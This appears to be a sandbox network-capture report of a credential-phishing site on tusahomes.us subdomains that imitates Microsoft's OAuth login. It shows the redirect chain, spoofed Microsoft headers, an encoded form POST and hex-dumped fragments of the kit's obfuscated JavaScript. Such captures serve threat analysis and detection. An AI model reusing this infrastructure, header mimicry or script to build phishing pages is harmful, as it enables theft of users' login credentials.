                                                                2025-04-09 00:18:47 UTC16384INData Raw: 67 67 44 43 41 6a 4f 51 4d 41 51 51 41 68 44 51 73 67 42 55 48 51 41 57 6f 6b 41 43 41 4f 4b 41 49 4d 49 68 45 68 42 45 51 41 41 41 41 41 41 41 41 41 41 43 45 6a 52 41 41 41 41 41 41 41 41 41 41 41 49 53 51 6a 41 45 46 41 61 69 49 43 4a 41 41 43 51 41 4a 2b 41 6b 42 42 41 53 41 45 4b 51 4d 41 51 67 4a 39 49 68 2b 6e 49 42 39 43 41 31 6f 62 51 51 46 72 44 67 49 43 45 41 41 4c 41 6b 41 67 42 43 30 41 43 45 55 45 51 43 41 43 51 53 42 71 45 4e 6f 42 49 41 49 6f 41 69 42 42 41 55 63 4e 41 53 41 43 49 41 49 6f 41 69 51 32 41 69 77 6a 41 45 45 51 61 79 49 44 4a 41 41 67 41 6b 45 73 61 69 49 46 4b 41 49 41 45 45 34 68 42 79 41 44 51 51 68 71 45 4b 73 43 49 41 4a 42 47 47 6f 69 42 69 41 44 4b 41 49 49 49 67 67 45 66 79 41 44 4b 41 49 4d 42 53 41 48 43 7a 59 43 42
                                                                Data Ascii: ggDCAjOQMAQQAhDQsgBUHQAWokACAOKAIMIhEhBEQAAAAAAAAAACEjRAAAAAAAAAAAISQjAEFAaiICJAACQAJ+AkBBASAEKQMAQgJ9Ih+nIB9CA1obQQFrDgICEAALAkAgBC0ACEUEQCACQSBqENoBIAIoAiBBAUcNASACIAIoAiQ2AiwjAEEQayIDJAAgAkEsaiIFKAIAEE4hByADQQhqEKsCIAJBGGoiBiADKAIIIggEfyADKAIMBSAHCzYCB
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 30 41 49 41 41 67 42 6b 46 38 63 57 6f 69 41 79 77 41 41 45 47 2f 66 30 6f 68 42 43 41 48 51 51 46 47 44 51 41 67 42 43 41 44 4c 41 41 42 51 62 39 2f 53 6d 6f 68 42 43 41 48 51 51 4a 47 44 51 41 67 42 43 41 44 4c 41 41 43 51 62 39 2f 53 6d 6f 68 42 41 73 67 42 6b 45 43 64 69 45 46 49 41 45 67 42 47 6f 68 42 41 4e 41 49 41 41 68 41 79 41 46 52 51 30 43 51 63 41 42 49 41 55 67 42 55 48 41 41 55 38 62 49 67 5a 42 41 33 45 68 42 79 41 47 51 51 4a 30 49 51 42 42 41 43 45 43 49 41 56 42 42 45 38 45 51 43 41 44 49 41 42 42 38 41 64 78 61 69 45 49 49 41 4d 68 41 51 4e 41 49 41 49 67 41 53 67 43 41 43 49 43 51 58 39 7a 51 51 64 32 49 41 4a 42 42 6e 5a 79 51 59 47 43 68 41 68 78 61 69 41 42 4b 41 49 45 49 67 4a 42 66 33 4e 42 42 33 59 67 41 6b 45 47 64 6e 4a 42 67
                                                                Data Ascii: 0AIAAgBkF8cWoiAywAAEG/f0ohBCAHQQFGDQAgBCADLAABQb9/SmohBCAHQQJGDQAgBCADLAACQb9/SmohBAsgBkECdiEFIAEgBGohBANAIAAhAyAFRQ0CQcABIAUgBUHAAU8bIgZBA3EhByAGQQJ0IQBBACECIAVBBE8EQCADIABB8AdxaiEIIAMhAQNAIAIgASgCACICQX9zQQd2IAJBBnZyQYGChAhxaiABKAIEIgJBf3NBB3YgAkEGdnJBg
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 30 41 43 77 73 67 41 41 75 32 41 77 45 47 66 79 4d 41 51 55 42 71 49 67 41 6b 41 43 41 41 51 53 42 71 51 62 53 39 77 41 41 51 69 51 49 67 41 43 67 43 49 43 45 43 49 41 41 67 41 43 67 43 4a 43 49 42 4e 67 49 38 49 41 41 67 41 6a 59 43 4f 41 4a 41 41 6b 41 43 51 41 4a 41 41 6b 41 67 41 6b 45 42 63 51 30 41 49 41 42 42 47 47 70 42 75 4c 33 41 41 42 43 4a 41 69 41 41 4b 41 49 59 49 51 49 67 41 43 67 43 48 43 45 42 49 41 42 42 4f 47 6f 69 41 78 44 62 41 69 41 41 49 41 45 32 41 6a 77 67 41 43 41 43 4e 67 49 34 49 41 4a 42 41 58 45 4e 41 43 41 41 51 52 42 71 51 62 43 39 77 41 41 51 69 51 49 67 41 43 67 43 45 43 45 43 49 41 41 6f 41 68 51 68 41 53 41 44 45 4e 73 43 49 41 41 67 41 54 59 43 50 43 41 41 49 41 49 32 41 6a 68 42 41 53 45 44 49 41 4a 42 41 58 46 46 44
                                                                Data Ascii: 0ACwsgAAu2AwEGfyMAQUBqIgAkACAAQSBqQbS9wAAQiQIgACgCICECIAAgACgCJCIBNgI8IAAgAjYCOAJAAkACQAJAAkAgAkEBcQ0AIABBGGpBuL3AABCJAiAAKAIYIQIgACgCHCEBIABBOGoiAxDbAiAAIAE2AjwgACACNgI4IAJBAXENACAAQRBqQbC9wAAQiQIgACgCECECIAAoAhQhASADENsCIAAgATYCPCAAIAI2AjhBASEDIAJBAXFFD
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 52 42 51 45 67 4e 41 67 77 42 43 79 41 42 49 41 52 71 4c 41 41 41 49 51 51 43 51 41 4a 41 41 6b 41 43 51 43 41 47 51 66 41 42 61 77 34 46 41 51 41 41 41 41 49 41 43 79 41 48 51 51 39 71 51 66 38 42 63 55 45 43 53 79 41 45 51 55 42 4f 63 67 30 44 44 41 49 4c 49 41 52 42 38 41 42 71 51 66 38 42 63 55 45 77 54 77 30 43 44 41 45 4c 49 41 52 42 6a 33 39 4b 44 51 45 4c 49 41 49 67 41 30 45 43 61 69 49 45 54 51 52 41 51 67 41 68 44 77 77 46 43 79 41 42 49 41 52 71 4c 41 41 41 51 62 39 2f 53 67 30 43 51 67 41 68 44 79 41 44 51 51 4e 71 49 67 51 67 41 6b 38 4e 42 43 41 42 49 41 52 71 4c 41 41 41 51 62 39 2f 54 41 30 46 51 6f 43 41 67 49 43 41 34 41 41 4d 41 77 74 43 67 49 43 41 67 49 41 67 44 41 49 4c 51 67 41 68 44 79 41 44 51 51 4a 71 49 67 51 67 41 6b 38 4e 41
                                                                Data Ascii: RBQEgNAgwBCyABIARqLAAAIQQCQAJAAkACQCAGQfABaw4FAQAAAAIACyAHQQ9qQf8BcUECSyAEQUBOcg0DDAILIARB8ABqQf8BcUEwTw0CDAELIARBj39KDQELIAIgA0ECaiIETQRAQgAhDwwFCyABIARqLAAAQb9/Sg0CQgAhDyADQQNqIgQgAk8NBCABIARqLAAAQb9/TA0FQoCAgICA4AAMAwtCgICAgIAgDAILQgAhDyADQQJqIgQgAk8NA


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.549734137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:48 UTC946OUTPOST /?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3D HTTP/1.1
                                                                Host: vericast.tusahomes.us
                                                                Connection: keep-alive
                                                                Content-Length: 3873
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://vericast.tusahomes.us
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://vericast.tusahomes.us/?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3D
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:48 UTC3873OUTData Raw: 6a 6f 74 6d 6e 3d 63 48 4a 6f 65 57 4e 73 65 47 64 6f 59 6d 4a 6e 59 6d 52 78 5a 47 46 30 61 57 31 73 61 58 56 6a 59 57 52 78 59 57 74 6e 65 47 68 34 62 57 4e 36 64 47 52 6c 61 6e 56 32 63 48 56 30 62 48 68 68 65 47 5a 35 65 57 74 69 65 6e 4e 31 64 33 6c 6d 64 57 70 33 26 75 70 6d 7a 79 67 68 6a 6e 6b 3d 59 57 70 75 61 47 78 7a 5a 47 39 6f 61 47 6c 6d 59 58 68 76 61 48 56 6b 59 6d 31 6d 62 57 35 32 65 6d 64 32 62 6e 64 72 62 6d 78 32 63 47 78 6a 62 6d 78 72 61 58 56 6e 64 48 6c 6a 65 47 56 6a 61 57 74 6f 26 7a 70 61 67 6d 3d 59 6e 64 33 61 32 4a 36 64 58 70 78 62 6d 39 78 5a 6e 56 34 62 32 5a 77 5a 6e 56 68 64 48 4a 78 64 57 64 76 62 6d 56 32 62 58 4a 78 61 57 4e 75 59 32 56 68 5a 48 6c 6b 63 57 5a 73 64 6d 52 75 63 32 31 7a 64 6e 4e 74 5a 33 52 6d 65 6e
                                                                Data Ascii: jotmn=cHJoeWNseGdoYmJnYmRxZGF0aW1saXVjYWRxYWtneGh4bWN6dGRlanV2cHV0bHhheGZ5eWtienN1d3lmdWp3&upmzyghjnk=YWpuaGxzZG9oaGlmYXhvaHVkYm1mbW52emd2bndrbmx2cGxjbmxraXVndHljeGVjaWto&zpagm=Ynd3a2J6dXpxbm9xZnV4b2ZwZnVhdHJxdWdvbmV2bXJxaWNuY2VhZHlkcWZsdmRuc21zdnNtZ3Rmen
                                                                2025-04-09 00:18:49 UTC251INHTTP/1.1 302 Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:18:49 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                location: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us?wZfUflpx=67f5bce71f9fd88e9ef40d75


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.549736137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:50 UTC781OUTGET /?wZfUflpx=67f5bce71f9fd88e9ef40d75 HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Referer: https://vericast.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:52 UTC931INHTTP/1.1 302 Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:18:52 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 179961
                                                                Connection: close
                                                                cache-control: no-store, no-cache
                                                                pragma: no-cache
                                                                location: https://c547f1062152409fa58dda457a02be72.tusahomes.us/login#
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: 5fabf075-78ed-4ecb-9767-a6ae2bc75300
                                                                x-ms-ests-server: 2.1.20465.4 - WUS3 ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                set-cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; Domain=tusahomes.us; HttpOnly; Path=/; SameSite=none; Secure
                                                                2025-04-09 00:18:52 UTC15453INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 31 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 35 35 37 38 29 2c 6f 3d 65 28 37 32 35 35 29 2c 69 3d 65 28 35 37 35 35 29 2c 61 3d 65 28 31 38 36 36 29 2c 75 3d 65 28 36 30 32 39 29 2c 63 3d 65 28 35 30 32 32 29 2c 73 3d 6e 2e 53 79 6d 62 6f 6c 2c 66 3d 6f 28 22 77 6b 73 22 29 2c 70 3d 63 3f 73 2e 66 6f 72 7c 7c 73 3a 73 26 26 73 2e 77 69 74 68 6f 75 74 53 65 74 74 65 72 7c 7c 61 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75
                                                                Data Ascii: <html><head><title>Object moved</title><script type="text/javascript">(()=>{"use strict";var t={1:(t,r,e)=>{var n=e(5578),o=e(7255),i=e(5755),a=e(1866),u=e(6029),c=e(5022),s=n.Symbol,f=o("wks"),p=c?s.for||s:s&&s.withoutSetter||a;t.exports=function(t){retu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.549737137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:53 UTC795OUTGET /login HTTP/1.1
                                                                Host: c547f1062152409fa58dda457a02be72.tusahomes.us
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Referer: https://vericast.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:18:55 UTC1322INHTTP/1.1 302 Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:18:55 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                location: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0
                                                                request-context: appId=
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-ua-compatible: IE=edge,chrome=1
                                                                request-id: db27b189-68e1-458c-891f-d02b320b916c
                                                                x-cache: CONFIG_NOCACHE
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.549738137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:55 UTC1644OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0 HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Referer: https://vericast.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:18:58 UTC798INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:18:58 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 201414
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cache-control: no-store, no-cache
                                                                pragma: no-cache
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: ca4d3fff-eff3-427f-afe3-686d2b672800
                                                                x-ms-ests-server: 2.1.20540.2 - NCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-clitelem: 1,50168,0,,
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                2025-04-09 00:18:58 UTC15586INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c
                                                                Data Ascii: <!DOCTYPE html><html><head><title>Redirecting</title><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/><meta content="IE=edge" http-equiv="X-UA-Compatible"/><meta content="width=device-width, initial-scale=1.0, maximum-scale=2.0,
                                                                2025-04-09 00:18:58 UTC14483INData Raw: 65 6c 65 74 65 20 79 2e 66 62 75 6e 64 6c 65 2c 65 2e 41 64 64 28 79 2e 62 75 6e 64 6c 65 2c 22 57 65 62 57 61 74 73 6f 6e 5f 44 65 6d 61 6e 64 4c 6f 61 64 65 64 22 29 2c 65 2e 4c 6f 61 64 28 72 2c 74 29 2c 45 3d 21 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 69 66 28 68 2e 24 57 65 62 57 61 74 73 6f 6e 29 7b 69 66 28 68 2e 24 57 65 62 57 61 74 73 6f 6e 2e 69 73 50 72 6f 78 79 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 74 28 29 7d 6d 2e 77 68 65 6e 28 22 24 57 65 62 57 61 74 73 6f 6e 2e 66 75 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 62 2e 6c 65 6e 67 74 68 3e 30 3b 29 7b 76 61 72 20 65 3d 62 2e 73 68 69 66 74 28 29 3b 65 26 26 68 2e 24 57 65 62 57 61 74 73 6f 6e 5b 65 2e 63 6d 64 4e 61 6d 65 5d 2e 61 70 70 6c 79 28 68 2e 24 57 65 62
                                                                Data Ascii: elete y.fbundle,e.Add(y.bundle,"WebWatson_DemandLoaded"),e.Load(r,t),E=!0}}function r(){if(h.$WebWatson){if(h.$WebWatson.isProxy){return void t()}m.when("$WebWatson.full",function(){for(;b.length>0;){var e=b.shift();e&&h.$WebWatson[e.cmdName].apply(h.$Web
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 37 38 29 2c 61 3d 4f 62 6a 65 63 74 2c 75 3d 6e 28 22 22 2e 73 70 6c 69 74 29 3b 74 2e 65 78 70 6f 72 74 73 3d 6f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 61 28 22 7a 22 29 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 28 30 29 7d 29 29 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 53 74 72 69 6e 67 22 3d 3d 3d 69 28 74 29 3f 75 28 74 2c 22 22 29 3a 61 28 74 29 7d 3a 61 7d 2c 32 32 37 37 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 35 38 33 35 29 2e 66 2c 6f 3d 65 28 35 37 35 35 29 2c 69 3d 65 28 31 29 28 22 74 6f 53 74 72 69 6e 67 54 61 67 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 74 26 26 21 65 26 26 28 74 3d 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c
                                                                Data Ascii: 78),a=Object,u=n("".split);t.exports=o((function(){return!a("z").propertyIsEnumerable(0)}))?function(t){return"String"===i(t)?u(t,""):a(t)}:a},2277:(t,r,e)=>{var n=e(5835).f,o=e(5755),i=e(1)("toStringTag");t.exports=function(t,r,e){t&&!e&&(t=t.prototype),
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 3d 61 2e 43 4f 4e 46 49 47 55 52 41 42 4c 45 2c 62 3d 64 2e 49 74 65 72 61 74 6f 72 50 72 6f 74 6f 74 79 70 65 2c 6d 3d 64 2e 42 55 47 47 59 5f 53 41 46 41 52 49 5f 49 54 45 52 41 54 4f 52 53 2c 53 3d 79 28 22 69 74 65 72 61 74 6f 72 22 29 2c 77 3d 22 6b 65 79 73 22 2c 4f 3d 22 76 61 6c 75 65 73 22 2c 6a 3d 22 65 6e 74 72 69 65 73 22 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 2c 61 2c 79 2c 64 2c 45 29 7b 63 28 65 2c 72 2c 61 29 3b 76 61 72 20 41 2c 50 2c 54 2c 52 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 3d 3d 3d 79 26 26 5f 29 72 65 74 75 72 6e 20 5f 3b 69 66 28 21 6d 26 26 74 26 26 74 20 69 6e 20 46 29 72 65 74 75 72 6e 20 46 5b 74 5d
                                                                Data Ascii: =a.CONFIGURABLE,b=d.IteratorPrototype,m=d.BUGGY_SAFARI_ITERATORS,S=y("iterator"),w="keys",O="values",j="entries",I=function(){return this};t.exports=function(t,r,e,a,y,d,E){c(e,r,a);var A,P,T,R=function(t){if(t===y&&_)return _;if(!m&&t&&t in F)return F[t]
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 29 5b 27 73 65 61 72 63 68 27 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 29 5b 5a 6a 28 30 78 34 32 35 29 5d 28 29 5b 5a 6a 28 30 78 33 36 62 29 5d 28 61 30 72 29 5b 5a 6a 28 30 78 33 33 37 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 29 3b 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 61 30 5a 28 29 7b 76 61 72 20 67 57 3d 5b 27 70 72 6f 6d 69 73 65 27 2c 27 64 6f 74 41 6c 6c 27 2c 27 61 64 64 27 2c 27 73 65 74 27 2c 27 77 43 52 56 41 27 2c 27 65 78 65 63 75 74 65 27 2c 27 64 73 63 42 4d 27 2c 27 49 4e 75 72 4e 27 2c 27 5a 73 6a 56 78 27 2c 27 75 45 79 55 67 27 2c 27 65 72 72 6f 72 27 2c 27 5f 62 75 66 66 65 72 53 69 7a 65 27 2c 27 67 72 6f 75 70 73 27 2c 27 6a 61 76 61 27 2c 27 48 57 54 74 4f 27 2c 27 72 59 57 76 42 27 2c 27 73 70 6c 69 74 27 2c 27 73
                                                                Data Ascii: )['search']('(((.+)+)+)+$')[Zj(0x425)]()[Zj(0x36b)](a0r)[Zj(0x337)]('(((.+)+)+)+$');});function a0Z(){var gW=['promise','dotAll','add','set','wCRVA','execute','dscBM','INurN','ZsjVx','uEyUg','error','_bufferSize','groups','java','HWTtO','rYWvB','split','s
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 27 67 65 74 55 54 43 4d 69 6e 75 74 65 73 27 5d 29 2c 79 48 3d 79 4a 28 79 75 5b 76 46 28 30 78 32 39 65 29 5d 29 2c 79 47 3d 79 4a 28 79 75 5b 76 46 28 30 78 32 62 62 29 5d 29 3b 79 6d 5b 76 46 28 30 78 33 31 38 29 5d 3d 79 4e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 76 4c 3d 76 46 3b 72 65 74 75 72 6e 20 76 4c 28 30 78 33 62 64 29 21 3d 3d 79 7a 5b 76 4c 28 30 78 31 61 34 29 5d 28 6e 65 77 20 44 61 74 65 28 2d 30 78 32 64 37 39 38 38 33 64 32 30 30 31 29 29 3b 7d 29 7c 7c 21 79 4e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 76 59 3d 76 46 3b 79 7a 5b 76 59 28 30 78 31 61 34 29 5d 28 6e 65 77 20 44 61 74 65 28 4e 61 4e 29 29 3b 7d 29 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 76 78 3d 76 46 3b 69 66 28 21 79 50 28 79 61 28 74 68 69 73 29
